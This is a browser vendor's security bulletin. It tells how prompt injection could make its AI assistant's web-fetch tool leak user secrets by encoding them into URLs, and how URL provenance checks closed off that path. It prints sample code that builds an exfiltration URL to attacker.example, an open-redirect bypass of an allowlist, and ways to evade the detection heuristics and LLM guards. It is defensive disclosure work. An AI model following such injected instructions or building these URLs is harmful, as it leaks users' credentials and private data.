Our latest updates on Security

Welcome to our Dia Security Bulletin. Here you’ll find the most up-to-date information on recent security fixes and security news for Dia. We get into the weeds a little here; if you have any questions, you can always reach us at security@thebrowser.company.

February 12, 2026

Security Story of fetch_web_content

How we built a powerful feature, discovered it could be exploited, and rebuilt it from the ground up with security at its core.

TL;DR

This post tells the story of fetch_web_content, a tool that lets Dia retrieve information from the web on your behalf. We built it, discovered it could be exploited for data exfiltration via prompt injection, spent months trying to secure it with detection-based approaches, and ultimately concluded that detection wasn't enough. We made the difficult decision to remove the feature before Dia's public beta in June 2025. Two months later, we brought it back—rebuilt from the ground up with architectural controls that remain secure even when prompt injection occurs.

This is a story about what it looks like to take AI security seriously: acknowledging when something isn't working, having the discipline to unship, and investing in solutions that address root causes rather than symptoms. It's also just one example—Dia's security architecture includes many layers of protection, each designed to address different threat vectors. This post is a deep dive into one of them.

What is fetch_web_content?

fetch_web_content is one of Dia's most versatile tools. It allows the assistant to retrieve information from URLs—pulling in web pages, documentation, articles, and other online resources to provide richer, more informed responses.

When a user asks Dia to summarize a link, check the status of a service, or pull in context from the web, fetch_web_content makes that possible. It's the kind of capability that transforms an AI assistant from a static knowledge base into a dynamic, connected helper.

We were excited to ship it. It was one of the first tools we built—present in Dia's earliest internal builds back in January 2025.

Then we broke it.

The Discovery: Data Exfiltration via URL Encoding

During security testing, our team uncovered a serious vulnerability class. The attack vector was elegant in its simplicity and terrifying in its implications.

Here's how it works:

URLs can encode arbitrary data. A URL like https://attacker.com/log?data=secret123 transmits secret123 to attacker.com when fetched.

LLMs are eager to follow instructions. If an attacker can inject malicious instructions into content the model processes (via prompt injection), they can instruct the model to:

  1. Extract sensitive information from the user's context
  2. Encode that data into a URL parameter
  3. Call fetch_web_content on that URL

The fetch itself becomes the exfiltration. The moment Dia makes that request, the sensitive data—passwords, API keys, private conversations, whatever was in context—gets transmitted to the attacker's server in the request logs.

No fancy exploits. No zero-days. Just the normal, intended behavior of a URL fetch, exploited through prompt injection.
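To make the mechanics concrete, here is a minimal sketch of the encoding step using Python's standard library. The domain, parameter name, and secret value are all illustrative:

```python
from urllib.parse import urlencode, urlparse, parse_qs

# Any string -- an API key, a snippet of conversation -- can be packed
# into a query parameter. The attacker's server simply logs the request.
secret = "sk-live-abc123"  # illustrative value, not a real key
exfil_url = "https://attacker.example/log?" + urlencode({"data": secret})

# When this URL is fetched, the secret travels in the request itself and
# lands in the attacker's access logs. No exploit required.
print(exfil_url)  # https://attacker.example/log?data=sk-live-abc123

# Decoding on the receiving end is equally trivial:
recovered = parse_qs(urlparse(exfil_url).query)["data"][0]
```

The entire "attack" is ordinary URL construction, which is exactly why it is so hard to distinguish from legitimate use.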

The Attempt: Can We Detect and Block This?

Once we understood the shape of the attack, our first instinct was straightforward: keep the feature, but get really good at spotting the bad cases.

That led us down the detection path. We tried a bunch of variants of the same basic idea: let the model decide what to fetch, then add checks to catch exfiltration before the request goes out.

Here’s what we tested through the first half of 2025:

  • URL allowlisting and blocklisting — This sounds reasonable until you remember how cheap domains are. Attackers can register new domains instantly, and even legitimate sites can be turned into collection endpoints.
  • Pattern detection for sensitive data in URLs — We looked for things that “seem like secrets” (tokens, keys, long base64-ish blobs, etc.). The false positive rate was brutal, because real-world URLs are full of encoded parameters. And in the cases that mattered most, attackers could just transform or split the data until it no longer matched.
  • Heuristic analysis of URL structure — We tried scoring requests based on URL shape: parameter length, entropy, suspicious parameter names, unusual encoding patterns, and so on. This helped catch the obvious stuff, but sophisticated attackers would have no trouble producing URLs that looked completely normal.
  • Output filtering — Another thought was “even if the model tries to exfiltrate, we’ll catch it on the way out.” But the model can obfuscate data before encoding it, or distribute it across multiple innocuous-looking requests.
  • Prompt-based guardrails — We also tried the standard "tell the model not to do that" approach. The problem is prompt injection is the attack. If your defense relies on the model consistently ignoring malicious instructions, you're betting against the one thing the attacker is best positioned to influence.
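To illustrate why the heuristic approaches fall short, here is a simplified sketch of an entropy-based URL check and its trivial evasion. The threshold, function names, and URLs are illustrative, not what Dia actually ran:

```python
import math
from collections import Counter
from urllib.parse import urlparse, parse_qs

def shannon_entropy(s: str) -> float:
    """Bits per character; high values suggest random-looking data."""
    counts = Counter(s)
    return -sum((c / len(s)) * math.log2(c / len(s)) for c in counts.values())

def looks_suspicious(url: str, threshold: float = 3.5) -> bool:
    """Flag URLs whose longer query values look like high-entropy blobs."""
    qs = parse_qs(urlparse(url).query)
    return any(shannon_entropy(v) > threshold
               for vals in qs.values() for v in vals if len(v) > 8)

# A raw base64-style token trips the heuristic...
blob_url = "https://x.example/p?t=aGVsbG8gd29ybGQhISE="

# ...but the same payload, split into short word-like chunks across
# parameters (or across multiple requests), sails right through.
split_url = "https://x.example/p?a=hello&b=world"
```

The attacker controls the encoding, so any fixed notion of "looks like a secret" can be transformed away.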

We also explored a natural escalation of these ideas: using LLMs themselves as part of the defense—either to review the page context for signs of prompt injection, or to inspect the generated URL and decide whether it looked like exfiltration.

On paper, this is appealing. Models can reason about intent, generalize beyond fixed patterns, and catch things that would slip past regex and heuristics.

In practice, it didn’t change the outcome. Our team was able to bypass every LLM-based detection mechanism we tried—regardless of model size—using the same playbook attackers use everywhere else: obfuscation, indirection, chunking, encoding, and “make it look normal” transformations. Even when the guard model did flag attacks, it wasn’t consistent enough to be a security boundary we could actually rely on.

We kept circling back to the same uncomfortable conclusion: we were trying to tell the difference between a legitimate fetch and a malicious fetch after the model had already decided to make the request—and the adversary could shape both the content and the model’s behavior.

Detection-based security is not sufficient when the attacker controls the input to your detector and can influence the detector's ruleset.

What About Asking the User?

There's one mitigation we haven't mentioned yet: human-in-the-loop confirmation. What if we just asked the user before fetching each URL?

This sounds reasonable. It's a pattern users have seen before—banks, social networks, and other sites show similar prompts when you click an external link. But we concluded that humans couldn't effectively be in the loop here, for several reasons:

The risk profile is completely different. Those familiar prompts warn you that you're leaving a trusted site—not that your data might be stolen immediately by proceeding. When a bank shows "You are now leaving Example Bank," the worst case is usually landing on a phishing page you can recognize and close. Our prompt would need to communicate something much more severe: "If you approve this, sensitive data from your context could be transmitted to an attacker." Users aren't trained to think about URL fetches this way, and we couldn't expect them to understand how novel this situation is.

It's a terrible user experience. Dia often fetches multiple URLs to answer a single question—pulling in documentation, checking references, gathering context. Prompting for each fetch would be exhausting and would undermine the core value of having an AI assistant that can work with the web on your behalf.

Even "allowlist this domain" doesn't work. You might think users could approve trusted domains once and be done with it. But most major domains have open redirects—URL endpoints that will redirect to any destination. Allowlist youtube.com, and an attacker can use YouTube's well-known open redirect to bounce data to their own server. The allowlist becomes a bypass, not a protection.
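A sketch of why per-domain allowlisting fails against open redirects, assuming a naive hostname check (the redirect endpoint shape is illustrative):

```python
from urllib.parse import urlparse, urlencode

ALLOWLIST = {"youtube.com", "www.youtube.com"}

def host_allowed(url: str) -> bool:
    """Naive allowlist: trust the URL if its hostname is approved."""
    return urlparse(url).hostname in ALLOWLIST

# An attacker routes the fetch through a trusted host's redirect
# endpoint. The hostname check passes, but the request ultimately
# bounces to attacker-controlled territory.
bounce = ("https://www.youtube.com/redirect?" +
          urlencode({"q": "https://attacker.example/log?data=secret123"}))
```

The allowlist check sees only the trusted hostname; the real destination rides along in a query parameter.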

In this situation, we couldn't make users the security boundary. The solution had to be architectural.

The Decision: Unlaunch

By June 2025, we were preparing to launch Dia's public beta. We had a decision to make.

This wasn't a close call. We had a feature that could be exploited to exfiltrate user data, and we couldn't reliably prevent it.

We unlaunched fetch_web_content. It didn't ship with the beta.

Shipping fast matters. Shipping secure matters more.

The Rebuild: Secure by Design

We went back to first principles. Instead of asking "how do we detect malicious fetches?" we asked "how do we make this class of malicious fetches impossible in practice?"

The answer required rethinking the feature's architecture entirely:

URL Provenance

By design, fetch_web_content enforces provenance—a clear chain of custody showing where a URL came from. URLs that appear in the user's browsing context, their tabs, their messages? Those have provenance. URLs the model generates from whole cloth, potentially stuffed with exfiltrated data? Those don't.

If a URL can't demonstrate where it came from, fetch_web_content is designed to reject it.

URLs with provenance (allowed):

  • A link the user clicks or pastes—"Summarize this article" with a URL from their clipboard or an open tab
  • A link visible in the user's browsing context—a URL from a webpage they're actively viewing
  • A link from a message or email—a URL that appeared in a Slack message, email, or chat the user shared with Dia
  • A link from a document the user opened—a URL embedded in a PDF, Google Doc, or Notion page the user explicitly gave Dia access to

URLs without provenance (blocked):

  • A URL the model generates from whole cloth, constructed by the model rather than drawn from anything the user provided
  • A URL that embeds data from the user's context, the exfiltration pattern described earlier

Provenance isn't about whether a URL looks safe—it's about whether we can trace it back to something the user actually provided or intended to access. The model can choose which URLs to fetch, but provenance enforcement dramatically narrows the set of URLs it can access to those rooted in the user's context.
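As a sketch of the idea (not Dia's actual implementation), provenance enforcement can be thought of as a registry of URLs observed in the user's context, consulted before any fetch. All names here are illustrative:

```python
from urllib.parse import urlparse

class ProvenanceRegistry:
    """Illustrative sketch: only URLs actually observed in the user's
    context (tabs, pastes, messages, documents) may be fetched."""

    def __init__(self) -> None:
        self._seen: set[str] = set()

    def observe(self, url: str) -> None:
        """Record a URL the user provided or is actively viewing."""
        self._seen.add(self._canonical(url))

    def may_fetch(self, url: str) -> bool:
        """Allow a fetch only if the URL has known provenance."""
        return self._canonical(url) in self._seen

    @staticmethod
    def _canonical(url: str) -> str:
        p = urlparse(url)
        return f"{p.scheme}://{p.netloc}{p.path}?{p.query}"

registry = ProvenanceRegistry()
registry.observe("https://docs.example.com/guide")  # e.g. from an open tab
```

A model-constructed URL stuffed with context data was never observed, so `may_fetch` rejects it regardless of what instructions the model was following.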

Assume Prompt Injection Will Happen

This is the key mental shift. We stopped designing for a world where we successfully block all prompt injection. We started designing for a world where prompt injection happens, and the attacker still can’t get the results they want.

When an attacker injects malicious instructions, Dia might follow them. It might even try to construct a malicious URL. But when it calls fetch_web_content, the URL is checked against its provenance policy. Attacker-constructed URLs are rejected before data leaves the device.

Defense in Depth

URL provenance is our primary control, but it's not our only one. We've layered additional safeguards throughout the system. The details are less important than the principle: no single control failing should compromise user security.

The Result

A couple of months later, fetch_web_content came back. It's just as useful as before—users can ask Dia to pull in web content, summarize articles, and work with online resources.

But now, even if an attacker achieves prompt injection, this attack vector is effectively closed off.

To be clear: this doesn't mean fetch_web_content is immune to all misuse, or that prompt injection is "solved." Other attack patterns require other defenses. What we've done is architecturally close off this specific threat—data exfiltration via URL encoding—so that even a successful prompt injection can't exploit it.

Why This Matters

The security community has been sounding the alarm on prompt injection for years. And they're right—it's a hard problem without a clean solution. You can't consistently and robustly detect all prompt injections, which means you can't fully trust model outputs.

But you can design systems that limit blast radius even when prompt injection succeeds.

This is the path forward for AI security: assume compromise, design for containment.

fetch_web_content is one tool, and URL provenance is one control. Dia's broader security posture includes many other systems—each with its own story of iteration, testing, and refinement. We'll share more of those stories over time.

Join Us

Building AI agents that can safely interact with the real world is still a frontier problem. The attacks are evolving, the tooling is immature, and the cost of getting it wrong is real user harm.

That’s why our Trust and Safety team is growing. If you’re excited about AI security—agent containment, prompt injection defense, tool safety, sandboxing, provenance, and defense-in-depth—and you want to help build Dia’s AI capabilities the right way, we’d love to talk.

We’re hiring.

January 15, 2026

CVE-2025-15032: Increased spoofing risk; custom new window missing about:blank

  • Summary: Increased spoofing risk in affected macOS versions of Dia.
  • CVE ID: CVE-2025-15032
  • Advisory Release Date: Fri, Jan 16, 2026
  • Affected Version: Dia version <1.9.0
  • Severity: High

Details

With this issue, an attacker-controlled site could open a new custom-sized window whose URL bar did not display about:blank. This could allow an attacker to make a window’s title appear to be a trusted domain and potentially mislead users about what site they were on.

In Dia versions ≥1.9.0, about:blank is displayed in the URL bar in these scenarios, which makes spoof attempts more visible.

Severity

The Browser Company rates this issue High with a CVSS v3.1 base score of 7.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N). This reflects our internal assessment—please evaluate applicability within your environment.

Affected Versions

Dia on macOS, versions <1.9.0

What do I need to do?

Update Dia to the latest available version. Any version 1.9.0 or newer contains the fix.

Credit

The Browser Company thanks frozzipies and novemberelang for reporting this issue through our vulnerability rewards program.

November 20, 2025

CVE-2025-13132: Increased spoofing risk; missing fullscreen toast

  • Summary: Increased spoofing risk in affected macOS versions of Dia.
  • CVE ID: CVE-2025-13132
  • Advisory Release Date: Fri, Nov 21, 2025
  • Affected Versions: Dia versions <1.6
  • Severity: High

Details

This vulnerability allowed a site to enter fullscreen without a fullscreen notification (toast) appearing. Without this notification, users could be misled about what site they were on if a malicious site rendered a fake UI (like a fake address bar).

In Dia versions ≥1.6, the fullscreen notification (toast) is enabled in all scenarios, informing users of the transition to fullscreen and making spoof attempts visible.

Severity

The Browser Company rates this issue High with a CVSS v3.1 base score of 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N). This reflects our internal assessment—please evaluate applicability within your environment.

Affected Versions

Dia on macOS, versions <1.6

What do I need to do?

Update Dia to the latest available version. Any version 1.6 or newer contains the fix.

Credit

The Browser Company thanks @frozzipies for reporting this issue through our vulnerability rewards program.

October 15, 2025

Introducing Dia’s Security Bulletin

Hi there, Cory here! I’m the Head of Security at The Browser Company. With the general availability of Dia being announced, the security team is introducing Dia’s Security Bulletin page.

Security has been at the core of how we built Dia. Being an AI Browser introduces novel security considerations—from prompt injection and model supply chain risks to client hardening and safe integrations. We’re committed to transparent, actionable communication when there’s something users or admins need to do.

This page will host:

  • Advisories: Clear guidance on vulnerabilities affecting Dia and steps to remediate.
  • CVE Notices: Disclosures aligned with our CNA policy and assignment process.
  • Security-impacting Release Notes: Highlights of patches, mitigations, and hardening work.
  • Enterprise Updates: Admin controls, policy changes, and audit-related information.

Publishing cadence will be event-driven: when there’s user or admin action to take, you’ll see it here first, with severity, affected versions, and fix paths.

If you believe you’ve found a security issue, please report it through our bug bounty program or responsible disclosure channels listed on the Dia Security Center. Thank you for helping us keep users safe.